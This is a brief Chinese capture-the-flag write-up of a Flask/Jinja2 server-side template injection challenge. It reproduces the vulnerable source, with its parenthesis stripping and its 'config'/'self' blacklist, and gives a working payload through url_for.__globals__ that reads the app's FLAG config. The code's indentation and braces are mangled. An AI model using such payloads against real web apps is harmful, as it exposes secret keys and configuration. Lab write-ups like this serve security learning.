首先打开场景
右击查看源代码
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{
{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
具体就是flask在shrine路径下,将“(”“)”替换成了空白字符串,将‘config’和‘self‘加入了黑名单。
通过特殊姿势读取文件,构造payload
{
{url_for.__globals__['current_app'].config.FLAG}}拿到flag
附上知识点参考:
欢迎私信交流学习